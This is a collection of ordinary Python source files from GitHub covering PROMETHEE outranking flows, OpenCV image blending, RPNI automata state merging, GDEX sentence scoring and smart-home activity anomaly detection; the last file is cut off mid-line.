+{"seq_id":"19279729422","text":"\"\"\"\n This module computes the outranking flows if basic(PROMETHEE I) or\n profile-based style.\n\n Implementation and naming of conventions are taken from\n :cite:p:'BransMareschal2005'\n\"\"\"\nimport pandas as pd\nfrom core.enums import FlowType\nfrom typing import Tuple, Union\n\n__all__ = [\"calculate_promethee_outranking_flows\"]\n\nfrom core.input_validation import basic_outranking_flows_validation, \\\n profile_based_outranking_flows_validation, \\\n check_outranking_flows_type\n\n\ndef _calculate_flow(preferences: Union[Tuple[pd.DataFrame, pd.DataFrame],\n pd.DataFrame],\n positive: bool = True) -> pd.Series:\n \"\"\"\n Calculate positive or negative outranking flow in basic(PROMETHEE I)\n style.\n\n :param preferences: pd.DataFrame with alternatives as index and\n alternatives as columns or Tuple of pd.DataFrame with alternatives as\n index and profiles as columns and pd.DataFrame with profiles as index\n and alternatives as columns.\n :param positive: bool, if True function returns positive outranking flow\n else returns negative outranking flow.\n :return: pd.Series with alternatives as index and positive or\n negative flows are values.\n \"\"\"\n if isinstance(preferences, tuple):\n if positive:\n flows = preferences[0].mean(axis=1)\n else:\n flows = preferences[1].mean(axis=0)\n return flows\n else:\n # Current alternative is not took into account\n # (btw. its inner preference is 0)\n axis = 1 if positive else 0\n aggregated_preferences = \\\n preferences.sum(axis=axis) / (preferences.shape[0] - 1)\n\n return aggregated_preferences\n\n\ndef _calculate_profile_based_flow(preferences: Tuple[pd.DataFrame,\n pd.DataFrame],\n profiles_preferences: pd.DataFrame,\n positive: bool = True) -> pd.Series:\n \"\"\"\n Calculate positive or negative outranking profile-based flows.\n\n :param preferences: Tuple of pd.DataFrame with alternatives as index\n and profiles as columns and pd.DataFrame with profiles as index\n and alternatives as columns.\n :param profiles_preferences: pd.DataFrame with profiles as index and\n profiles as columns.\n bool, if True function returns positive outranking flow\n else returns negative outranking flow.\n :return: pd.Series with\n MultiIndex(\"R\" + alternatives, profiles + alternative) as index and\n positive or negative flows are values.\n \"\"\"\n n_profiles = len(profiles_preferences)\n alternatives_groups_flows = []\n alternatives_groups_names = []\n axis = 1 if positive else 0\n\n # Iterate over alternatives\n for alternative, alternative_preferences in preferences[0].iterrows():\n # Create subset of profiles + current alternative preferences\n\n # Copy profiles preferences\n alternative_group_preferences = profiles_preferences.copy()\n # Add current alternative preferences to the end of\n # the subset (row and column)\n alternative_group_preferences.loc[alternative] = \\\n alternative_preferences\n alternative_group_preferences[alternative] = \\\n preferences[1][alternative]\n\n # Calculate flows for current group\n alternatives_groups_flows.append(\n alternative_group_preferences.sum(axis=axis) / n_profiles)\n alternatives_groups_names.append(f\"R{alternative}\")\n\n # Combine all groups flows\n return pd.concat(\n alternatives_groups_flows, keys=alternatives_groups_names)\n\n\ndef calculate_promethee_outranking_flows(\n preferences: Union[Tuple[pd.DataFrame, pd.DataFrame], pd.DataFrame],\n flow_type: FlowType,\n profiles_preferences: pd.DataFrame = None) -> pd.DataFrame:\n \"\"\"\n Calculate outranking flows in basic(PROMETHEE I) or profile-based style.\n Basic(PROMETHEE I) flows are calculated as mean of subtractions of\n preferences where current alternative is preferred to\n profiles/alternatives and preferences where profiles/alternatives\n is preferred to current alternative.\n Profile-based flows are calculated by creating\n subsets: profiles + current alternative and calculating flows in that\n set as in basic style. Because of modularity of this project\n preferences for that flows are obtained in different way (needs\n alternatives vs profiles and profiles vs profiles preferences).\n\n :param preferences: pd.DataFrame with alternatives as index and\n alternatives as columns or Tuple of pd.DataFrame with alternatives as\n index and alternatives as columns and pd.DataFrame with profiles as index\n and alternatives as columns.\n :param flow_type: FlowType enum with type of outranking\n flows (BASIC OR PROFILE_BASED).\n :param profiles_preferences: pd.DataFrame with profiles as index and\n profiles as columns.\n :return: pd.DataFrame with alternatives as index and 'positive' and\n 'negative' columns if flow_type is BASIC or pd.DataFrame with\n MultiIndex(\"R\" + alternatives, profiles+alternative) as index and\n 'positive' and 'negative' columns if flow_type is PROFILE_BASED.\n \"\"\"\n\n # flow_type validation\n check_outranking_flows_type(flow_type)\n\n if flow_type == FlowType.BASIC:\n # Input validation for basic(PROMETHEE I) style\n basic_outranking_flows_validation(preferences)\n\n # Get alternatives as index\n index = preferences[0].index if isinstance(preferences, tuple) \\\n else preferences.index\n return pd.DataFrame({'positive': _calculate_flow(preferences),\n 'negative':\n _calculate_flow(preferences, positive=False)\n }, index=index)\n\n elif flow_type == FlowType.PROFILE_BASED:\n # Input validation for profile-based style\n profile_based_outranking_flows_validation(preferences,\n profiles_preferences)\n return pd.DataFrame({'positive': _calculate_profile_based_flow(\n preferences, profiles_preferences),\n 'negative': _calculate_profile_based_flow(\n preferences, profiles_preferences,\n positive=False)})\n","repo_name":"WAndraszyk/Construct-your-own-PROMETHEE-with-Python-for-MCDA","sub_path":"modular_parts/flows/M8_PrometheeOutrankingFlows.py","file_name":"M8_PrometheeOutrankingFlows.py","file_ext":"py","file_size_in_byte":6350,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"23576089815","text":"import cv2\nimport numpy as np\n\nimg1 = cv2.imread('robot.jpg')\nimg2 = cv2.imread('opencv-logo2.png')\n#cv2.imshow('img1',img1)\n#cv2.imshow('img2',img2)\n\nrows, cols, channels = img2.shape\n#print(img2.shape)\nroi = img1[0:rows, 0:cols]\n#cv2.imshow('roi',roi)\nimg2gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n#cv2.imshow('img2gray',img2gray)\nret, mask = cv2.threshold(img2gray, 10,255, cv2.THRESH_BINARY)\n#cv2.imshow('mask',mask)\nmask_inv = cv2.bitwise_not(mask)\n#cv2.imshow('mask_inv',mask_inv)\nimg1_bg = cv2.bitwise_and(roi, roi, mask= mask_inv)\nimg1_fg = cv2.bitwise_and(img2,img2, mask=mask)\n#cv2.imshow('img1_bg',img1_bg)\n#cv2.imshow('img1_fg',img1_fg)\ndst = cv2.add(img1_bg,img1_fg)\n#cv2.imshow('dst',dst)\nimg1[0:rows, 0:cols] = dst\ncv2.imshow('img1',img1)\ncv2.waitKey()\n \n","repo_name":"siddhesh13/raspberryPi","sub_path":"OpenCV/addingTwoImages.py","file_name":"addingTwoImages.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"33232054788","text":"import pickle\nimport queue\nfrom functools import total_ordering\nfrom typing import Set\n\n\n@total_ordering\nclass RpniNode:\n __slots__ = ['output', 'children', 'prefix', \"type\"]\n\n def __init__(self, output=None, children=None, automaton_type='moore'):\n if output is None and automaton_type == 'mealy':\n output = dict()\n if children is None:\n children = dict()\n self.output = output\n self.children = children\n self.prefix = ()\n self.type = automaton_type\n\n def shallow_copy(self):\n output = self.output if self.type != 'mealy' else dict(self.output)\n return RpniNode(output, dict(self.children), self.type)\n\n def copy(self):\n return pickle.loads(pickle.dumps(self, -1))\n\n def __lt__(self, other):\n return (len(self.prefix), self.prefix) < (len(other.prefix), other.prefix)\n\n def __eq__(self, other):\n return self.prefix == other.prefix\n\n def __hash__(self):\n return id(self) # TODO This is a hack\n\n def get_all_nodes(self) -> Set['RpniNode']:\n qu = queue.Queue()\n qu.put(self)\n nodes = set()\n while not qu.empty():\n state = qu.get()\n nodes.add(state)\n for child in state.children.values():\n if child not in nodes:\n qu.put(child)\n return nodes\n\n def to_automaton(self):\n nodes = self.get_all_nodes()\n nodes.remove(self) # dunno whether order is preserved?\n nodes = [self] + list(nodes)\n return to_automaton(nodes, self.type)\n\n def compatible_outputs(self, other):\n so, oo = [self.output, other.output]\n cmp = lambda x, y: x is None or y is None or x == y\n if self.type == 'moore':\n return cmp(so, oo)\n else:\n return all(cmp(so[key], oo[key]) for key in filter(lambda k: k in oo, so))\n\n def get_child_by_prefix(self, prefix):\n node = self\n for symbol in prefix:\n node = node.children[symbol]\n return node\n\n\nclass StateMerging:\n def __init__(self, data, automaton_type, print_info=True):\n self.data = data\n self.automaton_type = automaton_type\n self.print_info = print_info\n\n self.root = createPTA(data, automaton_type)\n self.merges = []\n\n def merge(self, red_node, lex_min_blue, copy_nodes=False):\n \"\"\"\n Merge two states and return the root node of resulting model.\n \"\"\"\n\n if self.automaton_type == 'mealy':\n raise NotImplementedError()\n\n if not copy_nodes:\n self.merges.append((red_node, lex_min_blue))\n\n root_node = self.root.copy() if copy_nodes else self.root\n lex_min_blue = lex_min_blue.copy() if copy_nodes else lex_min_blue\n\n red_node_in_tree = root_node\n for p in red_node.prefix:\n red_node_in_tree = red_node_in_tree.children[p]\n\n to_update = root_node\n for p in lex_min_blue.prefix[:-1]:\n to_update = to_update.children[p]\n\n to_update.children[lex_min_blue.prefix[-1]] = red_node_in_tree\n\n if not self._fold(red_node_in_tree, lex_min_blue, not copy_nodes):\n return None\n\n return root_node\n\n def _fold(self, red_node, blue_node, report):\n # Change the output of red only to concrete output, ignore None\n if report and not RpniNode.compatible_outputs(red_node, blue_node):\n print(f\"conflict {red_node.prefix} ({red_node.output}) {blue_node.prefix} ({blue_node.output})\")\n return False\n red_node.output = blue_node.output if blue_node.output is not None else red_node.output\n\n for i in blue_node.children.keys():\n if i in red_node.children.keys():\n self._fold(red_node.children[i], blue_node.children[i], report)\n else:\n red_node.children[i] = blue_node.children[i]\n return True\n\n def to_automaton(self):\n return self.root.to_automaton()\n\n def replay_log(self, commands: list):\n for command, args in commands:\n if command == \"merge\":\n self.merge(self.root.get_child_by_prefix(args[0]), self.root.get_child_by_prefix(args[1]))\n elif command == \"promote\":\n pass\n\n @staticmethod\n def replay_log_on_pta(data, commands: list, automaton_type):\n sm = StateMerging(data, automaton_type)\n sm.replay_log(commands)\n return sm.to_automaton()\n\n\ndef check_sequence(root_node, seq, automaton_type):\n \"\"\"\n Checks whether each sequence in the dataset is valid in the current automaton.\n \"\"\"\n curr_node = root_node\n for i, o in seq:\n if automaton_type == 'mealy':\n input_outputs = {i: o for i, o in curr_node.children.keys()}\n if i[0] not in input_outputs.keys() or o is not None and input_outputs[i[0]] != o:\n return False\n curr_node = curr_node.children[(i[0], input_outputs[i[0]])]\n else:\n # For dfa and moore, check if outputs are the same, iff output in test data is concrete (not None)\n curr_node = curr_node.children[i]\n if o is not None and curr_node.output != o:\n return False\n return True\n\n\ndef createPTA(data, automaton_type):\n data.sort(key=lambda x: len(x[0]))\n\n root_node = RpniNode(automaton_type=automaton_type)\n for seq, label in data:\n curr_node = root_node\n for idx, symbol in enumerate(seq):\n if symbol not in curr_node.children.keys():\n node = RpniNode(automaton_type=automaton_type)\n node.prefix = curr_node.prefix + (symbol,)\n curr_node.children[symbol] = node\n\n if automaton_type == 'mealy' and idx == len(seq) - 1:\n if symbol not in curr_node.output:\n curr_node.output[symbol] = label\n if curr_node.output[symbol] != label:\n return None\n curr_node = curr_node.children[symbol]\n if automaton_type == 'moore' or automaton_type == 'dfa':\n if curr_node.output is None:\n curr_node.output = label\n if curr_node.output != label:\n return None\n\n return root_node\n\n\ndef extract_unique_sequences(root_node):\n def get_leaf_nodes(root):\n leaves = []\n\n def _get_leaf_nodes(node):\n if node is not None:\n if len(node.children.keys()) == 0:\n leaves.append(node)\n for n in node.children.values():\n _get_leaf_nodes(n)\n\n _get_leaf_nodes(root)\n return leaves\n\n leaf_nodes = get_leaf_nodes(root_node)\n paths = []\n for node in leaf_nodes:\n seq = []\n curr_node = root_node\n for i in node.prefix:\n curr_node = curr_node.children[i]\n seq.append((i, curr_node.output))\n paths.append(seq)\n\n return paths\n\n\ndef to_automaton(red, automaton_type):\n from aalpy.automata import DfaState, Dfa, MooreMachine, MooreState, MealyMachine, MealyState\n\n if automaton_type == 'dfa':\n state, automaton = DfaState, Dfa\n elif automaton_type == 'moore':\n state, automaton = MooreState, MooreMachine\n else:\n state, automaton = MealyState, MealyMachine\n\n initial_state = None\n prefix_state_map = {}\n for i, r in enumerate(red):\n if automaton_type == 'moore' or automaton_type == 'dfa':\n prefix_state_map[r.prefix] = state(f's{i}', r.output)\n else:\n prefix_state_map[r.prefix] = state(f's{i}')\n if i == 0:\n initial_state = prefix_state_map[r.prefix]\n\n for r in red:\n for i, c in r.children.items():\n if automaton_type == 'moore' or automaton_type == 'dfa':\n prefix_state_map[r.prefix].transitions[i] = prefix_state_map[c.prefix]\n else:\n prefix_state_map[r.prefix].transitions[i] = prefix_state_map[c.prefix]\n prefix_state_map[r.prefix].output_fun[i] = r.output[i] if i in r.output else None\n\n return automaton(initial_state, list(prefix_state_map.values()))\n\n\ndef visualize_pta(root_node, path='pta.pdf'):\n from pydot import Dot, Node, Edge\n graph = Dot('fpta', graph_type='digraph')\n\n graph.add_node(Node(str(root_node.prefix), label=f'{root_node.output}'))\n\n queue = [root_node]\n visited = set()\n visited.add(root_node.prefix)\n while queue:\n curr = queue.pop(0)\n for i, c in curr.children.items():\n if c.prefix not in visited:\n graph.add_node(Node(str(c.prefix), label=f'{c.output}'))\n graph.add_edge(Edge(str(curr.prefix), str(c.prefix), label=f'{i}'))\n if c.prefix not in visited:\n queue.append(c)\n visited.add(c.prefix)\n\n graph.add_node(Node('__start0', shape='none', label=''))\n graph.add_edge(Edge('__start0', str(root_node.prefix), label=''))\n\n graph.write(path=path, format='pdf')\n","repo_name":"DES-Lab/AALpy","sub_path":"aalpy/learning_algs/deterministic_passive/rpni_helper_functions.py","file_name":"rpni_helper_functions.py","file_ext":"py","file_size_in_byte":9033,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"7"}
+{"seq_id":"33390920711","text":"import csv\nimport ast\n\nfreq_most_common = []\nfreq_common = []\n# punctuation_pos = [\"SENT\", \"#\", \"$\", \"\\\"\", \"''\", \"'\", \"(\", \")\", \",\", \":\"]\n\n# ------------------------------------- GDEX POINTS -----------------------------------------------------\n\n\n# Sentence length: a sentence between 10 and 20 words long was preferred, with and shorter ones penalized.\n# No sentence is longer than 20 words.\n\ndef sentence_length(m_lemma_tag):\n # points = 20\n sent_length = len(m_lemma_tag)\n\n # sentence is greater than 10\n if sent_length >= 10:\n points = 20\n # sentence is smaller than 10\n else:\n points = 20 * (sent_length/10)\n\n return points\n\n\n# Word frequencies: a sentence was penalized for each word that was not amongst the commonest 17,000 words in the\n# language, with a further penalty applied for rare words.\n# max Points = 3\ndef common_words(m_lemma_tag):\n points = 0\n x = 100 / len(m_lemma_tag)\n # print(len(m_sentence[1]))\n\n # one free 'Punct' for end of sentence every other is negative\n punctuations = 0\n for m_word in m_lemma_tag:\n if m_word[1] == 'Punct':\n if punctuations == 0:\n points += x\n punctuations += 1\n else:\n # if you ignore proper nouns the resulting 'good' sentences are really bad\n if m_word[0] in freq_most_common:\n points += x\n elif m_word[0] in freq_common:\n points += x/2\n\n # for m_word in m_sentence[1]:\n # if m_word[0] in freq_most_common:\n # points += x\n # elif m_word[0] in freq_common:\n # points += x / 2\n\n points = 50 * (points/100)\n return points\n\n\n# Sentences containing pronouns and anaphors like this that it or one often fail to present a self-contained piece of\n# language which makes sense without further context, so sentences containing these words were penalized.\n# max Points = 1\ndef contain_pronouns_anaphora(m_lemma_tag):\n x = len(m_lemma_tag)\n found = x\n for m_word in m_lemma_tag:\n if m_word[1] == \"Pron\":\n found -= 1\n\n points = 20 * (found/x)\n return points\n\n\n# Whole sentenceidentified as beginning with a capital letter and ending with a full step, exclamation mark, or\n# question mark, were preferred.\n# max Points = 2\ndef whole_sentence(m_sentence):\n points = 10\n punctuation = [\"!\", \".\", \"?\"]\n #quote = ['\\'', '\"']\n first_letter = m_sentence[:1]\n last_letter = m_sentence[-1]\n\n if first_letter.isupper(): # or first_letter in quote:\n if last_letter in punctuation:\n pass # is upper and has punctuation\n else:\n points -= 5 # is upper and has no punctuation\n else:\n if last_letter in punctuation:\n points -= 5 # is not upper and has punctuation\n else:\n points -= 10 # is not upper and has no punctuation\n\n return points\n\n\n# ------------------------------------- LOAD FREQUENCIES --------------------------------------------------\n\ndef load_frequencies():\n with open('lemma.num.17000.txt', 'r') as freq_in:\n f = csv.reader(freq_in, delimiter=' ')\n row_number = 1\n for row in f:\n if row_number <= 7000:\n freq_most_common.append(row[2])\n else:\n freq_common.append(row[2])\n row_number += 1\n freq_in.close()\n\n\ndef compute_points(m_sentence, m_lemma_tag):\n\n points_len = sentence_length(m_lemma_tag) # max 20p\n # print(\"len\", points_len, \"/\", 20)\n\n points_common = common_words(m_lemma_tag) # max 50p\n # print(\"com\", points_common, \"/\", 50)\n\n points_pronoun = contain_pronouns_anaphora(m_lemma_tag) # max 20p\n # print(\"pro\", points_pronoun, \"/\", 20)\n\n points_whole_sent = whole_sentence(m_sentence) # max 10p\n # print(\"sent\", points_whole_sent, \"/\", 10)\n\n m_gdex_points = points_len + points_common + points_pronoun + points_whole_sent\n return round(m_gdex_points, 1)\n\n\ndef main():\n if __name__ == \"__main__\":\n print(\"#### starting loading sentence file ####\")\n\n with open(\"./output/03_1_sentences_from_corpus.txt\", 'r') as read_sent, \\\n open(\"./output/03_2_calculate_GDEX.csv\", \"w\") as s_out:\n index = 1\n writer = csv.writer(s_out, delimiter=';')\n good_sentence = 0\n bad_sentence = 0\n for line in read_sent:\n if index % 100000 == 0:\n print(\"{:,}\".format(index), \"/\", \"{:,}\".format(15500000))\n index += 1\n\n row_as_list = ast.literal_eval(line)\n\n # 0 | 1 | 2 | 3 | 4 | 5\n # vocable | chapter | book | sentence | lemmatag | lemmavocdict\n\n sentence = row_as_list[3]\n lemma_tag = row_as_list[4]\n\n gdex_number = compute_points(sentence, lemma_tag)\n row_as_list.insert(3, gdex_number)\n\n if gdex_number > 60:\n good_sentence += 1\n writer.writerow([row_as_list[0]] + [row_as_list[1]] + [row_as_list[2]] + [row_as_list[3]]\n + [row_as_list[4]] + [row_as_list[5]] + [row_as_list[6]])\n else:\n bad_sentence += 1\n\n s_out.close()\n read_sent.close()\n print(\"#### finished loading sentence file ####\")\n print(\"good:\", good_sentence)\n print(\"bad:\", bad_sentence)\n\n\nif __name__ == \"__main__\":\n print(\"#### starting loading sentence file ####\")\n average = 0\n index = 1\n highest = 0\n lowest = 100\n with open(\"./output/03_1_sentences_from_corpus.txt\", 'r') as read_sent, \\\n open(\"./output/03_2_calculate_GDEX.csv\", \"w\") as s_out:\n\n writer = csv.writer(s_out, delimiter=';')\n good_sentence = 0\n bad_sentence = 0\n for line in read_sent:\n if index % 100000 == 0:\n print(\"{:,}\".format(index), \"/\", \"{:,}\".format(15500000))\n index += 1\n\n row_as_list = ast.literal_eval(line)\n\n # 0 | 1 | 2 | 3 | 4 | 5\n # vocable | chapter | book | sentence | lemmatag | lemmavocdict\n\n sentence = row_as_list[3]\n lemma_tag = row_as_list[4]\n\n gdex_number = compute_points(sentence, lemma_tag)\n row_as_list.insert(3, gdex_number)\n\n average += gdex_number\n if gdex_number > highest:\n highest = gdex_number\n if gdex_number < lowest:\n lowest = gdex_number\n\n if gdex_number > 50:\n #print(sentence)\n #if \"I can smell\" in sentence:\n # print(\"gdex:\", gdex_number, sentence)\n good_sentence += 1\n writer.writerow([row_as_list[0]] + [row_as_list[1]] + [row_as_list[2]] + [row_as_list[3]]\n + [row_as_list[4]] + [row_as_list[5]] + [row_as_list[6]])\n else:\n bad_sentence += 1\n\n s_out.close()\n read_sent.close()\n print(\"#### finished loading sentence file ####\")\n print(\"good:\\t\", good_sentence)\n print(\"bad:\\t\", bad_sentence)\n print(\"avg:\\t\", gdex_number / index)\n print(\"high:\\t\", highest)\n print(\"low:\\t\", lowest)\n","repo_name":"Mells/Preprocess03","sub_path":"O3_extract_sentences_from_corpus/O3_2_calculate_GDEX.py","file_name":"O3_2_calculate_GDEX.py","file_ext":"py","file_size_in_byte":7411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"36763785377","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#from ARAS datasets Selected House A\n#Anomaly state is checked for resident 1 in House A\n#We divided the datasets into two equal parts\n#We used all the second 15 days of the datasets in to check for anomalies\n#You can change this division\n\n# DATASETS :\n# Change to CSV format \n# Add a row (first row) for the sensor name and resident number (In short)\n# Add a column to show the seconds.\n\n\n#The first 15 days (two weeks) are used for the initial learning of the algorithm.\n#from the sixteenth day, NNC begins to be calculated.\n\n# Pay Attention:\n# To use this code, the reading part of the datasets must be changed\n\n###............................................. Main Part ............................................\n\nimport random\nimport statistics\nimport numpy as np\nimport pandas as pd\nfrom sklearn import tree\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import precision_recall_fscore_support as score\n\n#........................................... Functions ..................................... :\n\ndef randomcheck(testday ,resident, classcode):\n subNNC = 0\n y = testday['r'+str(resident)]\n if classcode == 10 or classcode == 20:\n testday.drop(['r1'], axis=1 , inplace = True)\n testday.drop(['r2'], axis=1 , inplace = True)\n else:\n testday.drop(['r'+str(resident)], axis=1 , inplace = True)\n T = 0\n for i in range (3600):\n rt = random.randint(1,86400)\n yt = y[rt-1:rt]\n xt = testday[rt-1:rt]\n yp = globals()[\"dt\"+str(classcode)].predict(xt)\n if int(yt) == yp:\n T = T + 1\n if T < 900:\n subNNC = 20\n if T > 900 and T < 1400:\n subNNC = 14 \n if T > 1400 and T < 1900:\n subNNC = 12\n if T > 1900 and T < 2400:\n subNNC = 5\n if T > 2400 and T < 2900:\n subNNC = 3\n if T > 2900 and T < 3400:\n subNNC = 1\n return subNNC\n\n#.............////////////////////..............\n\ndef TimePart(day,resident):\n for g in range(27):\n globals()[\"p\"+str(g+1)] = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\n for n in range(24):\n for t in range(27):\n globals()[\"h\"+str(t+1)] = 0\n for s in range((n)*3600,((n+1)*3600)-1):\n o = day['r'+str(resident)][s]\n globals()[\"h\"+str(o)] = 1 + globals()[\"h\"+str(o)]\n if globals()[\"h\"+str(o)] > 60:\n globals()[\"p\"+str(o)][n] = 1\n out = [p1, p2, p3, p4, p5, p6, p7, p8, p9, p10, p11, p12, p13 , p14,\n p15, p16, p17, p18, p19, p20, p21, p22, p23, p24, p25, p26, p27]\n return out\n\n#.............////////////////////..............\n\ndef predNorm (x, classcode):\n \n for b in range(27):\n globals()[\"p\"+str(b+1)] = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\n for n in range(24):\n for b in range(27):\n globals()[\"y_pred\"+str(b+1)] = 0\n for s in range((n)*3600,((n+1)*3600)-1):\n pred = int(globals()[\"dt\"+str(classcode)].predict(x[s:s+1]))\n globals()[\"y_pred\"+str(pred)] = 1 + globals()[\"y_pred\"+str(pred)] \n if globals()[\"y_pred\"+str(pred)] > 60:\n globals()[\"p\"+str(pred)][n] = 1\n ex = [p1, p2, p3, p4, p5, p6, p7, p8, p9, p10, p11, p12, p13 , p14,\n p15, p16, p17, p18, p19, p20, p21, p22, p23, p24, p25, p26, p27] \n return ex\n\ndef checkpred (tday, resident, classcode):\n subNNC = 0\n real = TimePart(tday,resident)\n if classcode == 10 or classcode == 20:\n tday.drop(['r1'], axis=1 , inplace = True)\n tday.drop(['r2'], axis=1 , inplace = True)\n else:\n tday.drop(['r'+str(resident)], axis=1 , inplace = True)\n x_test = tday\n pred = predNorm(x_test, classcode)\n for d in range(27):\n if real[d] != pred[d]:\n subNNC = 1 + subNNC\n return subNNC\n\n#.............////////////////////..............\n\ndef norm (tday,resident):\n subNNC = 0\n for g in range(27):\n globals()[\"k\"+str(g+1)] = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\n\n#In this section, the datasets of the days should be entered in order\n for i in range(15):\n d = pd.read_csv('c://DAY_0'+str(i+1)+'.csv' , encoding = 'ansi')\n y = TimePart(d,resident) \n for f in range(27):\n for p in range(24):\n globals()[\"k\"+str(f+1)][p] = globals()[\"k\"+str(f+1)][p] + y[f][p]\n\n j = TimePart(tday,resident)\n for f in range(27):\n for k in range(24):\n timechart = globals()[\"k\"+str(f+1)][k]\n tcharttest = j[f][k]\n if timechart < 3 and tcharttest == 1:\n subNNC = subNNC + 1\n if timechart > 12 and tcharttest == 0:\n subNNC = subNNC + 1\n return subNNC\n\n#.............////////////////////..............\n\ndef sectable (dy, resident):\n\n for g in range(27):\n globals()[\"sec\"+str(g+1)] = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0] \n for n in range(24):\n for x in range((n)*3600,((n+1)*3600)-1):\n o = dy['r'+str(resident)][x]\n globals()[\"sec\"+str(o)][n] = 1 + globals()[\"sec\"+str(o)][n]\n secout = [sec1,sec2,sec3,sec4,sec5,sec6,sec7,sec8,sec9,sec10,sec11,sec12,sec13,sec14,\n sec15,sec16,sec17,sec18,sec19,sec20,sec21,sec22,sec23,sec24,sec25,sec26,sec27]\n return secout\n\ndef MaxMin (resident):\n for g in range(27):\n globals()[\"ma\"+str(g+1)] = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\n globals()[\"mi\"+str(g+1)] = [4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,\n 4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000,4000]\n \n#In this section, the datasets of the days should be entered in order\n for i in range(15):\n day = pd.read_csv('c://DAY_0'+str(i+1)+'.csv' , encoding = 'ansi')\n ts = sectable(day,resident)\n for w in range(27):\n for q in range(24):\n if ts[w][q] > globals()[\"ma\"+str(w+1)][q]:\n globals()[\"ma\"+str(w+1)][q] = ts[w][q]\n if ts[w][q] < globals()[\"mi\"+str(w+1)][q]:\n globals()[\"mi\"+str(w+1)][q] = ts[w][q] \n mintabl = [mi1,mi2,mi3,mi4,mi5,mi6,mi7,mi8,mi9,mi10,mi11,mi12,mi13,mi14,\n mi15,mi16,mi17,mi18,mi19,mi20,mi21,mi22,mi23,mi24,mi25,mi26,mi27]\n maxtabl = [ma1,ma2,ma3,ma4,ma5,ma6,ma7,ma8,ma9,ma10,ma11,ma12,ma13,ma14,\n ma15,ma16,ma17,ma18,ma19,ma20,ma21,ma22,ma23,ma24,ma25,ma26,ma27] \n return (mintabl , maxtabl)\n\ndef MaxMincheck(testday, resident):\n subNNC = 0\n st = sectable(testday, resident)\n mi , ma = MaxMin(resident)\n for p in range(27):\n for w in range(24):\n if st[p][w] < mi[p][w]:\n subNNC = 4 + subNNC\n if st[p][w] > ma[p][w]:\n subNNC = 2 + subNNC\n return subNNC\n\n#.............////////////////////..............\n\ndef TimeJob (daay, resident):\n \n for v in range(27):\n globals()[\"ac\"+str(v+1)] = [] \n for l in range(27):\n globals()[\"st\"+str(l+1)] = -1 \n t = 0 \n while t < 86400:\n z = t\n o = daay['r'+str(resident)][t]\n globals()[\"st\"+str(o)] = 1 + globals()[\"st\"+str(o)]\n globals()[\"ac\"+str(o)].append([z,1])\n globals()[\"ac\"+str(o)][globals()[\"st\"+str(o)]][1] = 1 + globals()[\"ac\"+str(o)][globals()[\"st\"+str(o)]][1]\n for a in range(z+1,86400):\n if daay['r'+str(resident)][a] == o:\n globals()[\"ac\"+str(o)][globals()[\"st\"+str(o)]][1] = 1 + globals()[\"ac\"+str(o)][globals()[\"st\"+str(o)]][1]\n if a == 86399:\n t = 86400\n else:\n t = a\n break\n t = t + 1\n\n acout = [len(ac1),len(ac2),len(ac3),len(ac4),len(ac5),len(ac6),len(ac7),len(ac8),len(ac9),len(ac10),\n len(ac11),len(ac12),len(ac13),len(ac14),len(ac15),len(ac16),len(ac17),len(ac18),len(ac19),\n len(ac20),len(ac21),len(ac22),len(ac23),len(ac24),len(ac25),len(ac26),len(ac27)]\n \n for m in range(27):\n globals()[\"tts\"+str(m+1)] = 0\n \n for g in range(27):\n h = globals()[\"ac\"+str(g+1)]\n for s in range(len(h)):\n globals()[\"tts\"+str(g+1)] = globals()[\"ac\"+str(g+1)][s][1] + globals()[\"tts\"+str(g+1)]\n \n ttsout = [tts1, tts2, tts3, tts4, tts5, tts6, tts7, tts8, tts9, tts10, tts11, tts12, tts13, tts14,\n tts15, tts16, tts17, tts18, tts19, tts20, tts21, tts22, tts23, tts24, tts25, tts26, tts27]\n \n return acout , ttsout\n \ndef numericalCheck (day, resident):\n subNNC = 0\n for v in range(27):\n globals()[\"c\"+str(v+1)] = 0 \n for f in range(27):\n globals()[\"s\"+str(f+1)] = 0\n for k in range(27):\n globals()[\"av\"+str(k+1)] = 0\n for d in range(27):\n globals()[\"mc\"+str(d+1)] = 0\n for s in range(27):\n globals()[\"mt\"+str(s+1)] = 0\n for s in range(27):\n globals()[\"mi\"+str(s+1)] = 90000\n#In this section, the datasets of the days should be entered in order\n for i in range(15):\n daaay = pd.read_csv('c://DAY_0'+str(i+1)+'.csv' , encoding = 'ansi')\n count , total = TimeJob(daaay,resident)\n for j in range(27):\n if count[j] > globals()[\"mc\"+str(j+1)]:\n globals()[\"mc\"+str(j+1)] = count[j]\n if total[j] > globals()[\"mt\"+str(j+1)]:\n globals()[\"mt\"+str(j+1)] = total[j]\n if total[j] > 0:\n if total[j] < globals()[\"mi\"+str(j+1)]:\n globals()[\"mi\"+str(j+1)] = total[j]\n if count[j] > 0:\n globals()[\"c\"+str(j+1)] = globals()[\"c\"+str(j+1)] +1\n globals()[\"s\"+str(j+1)] = globals()[\"s\"+str(j+1)] +total[j]\n for g in range(27):\n if globals()[\"c\"+str(g+1)] > 0 :\n globals()[\"av\"+str(g+1)] = globals()[\"s\"+str(g+1)]/globals()[\"c\"+str(g+1)]\n \n cnt , ttl = TimeJob(day,resident)\n for r in range(27):\n if ttl[r] > 0 and ttl[r] < globals()[\"mi\"+str(r+1)]:\n subNNC = subNNC + 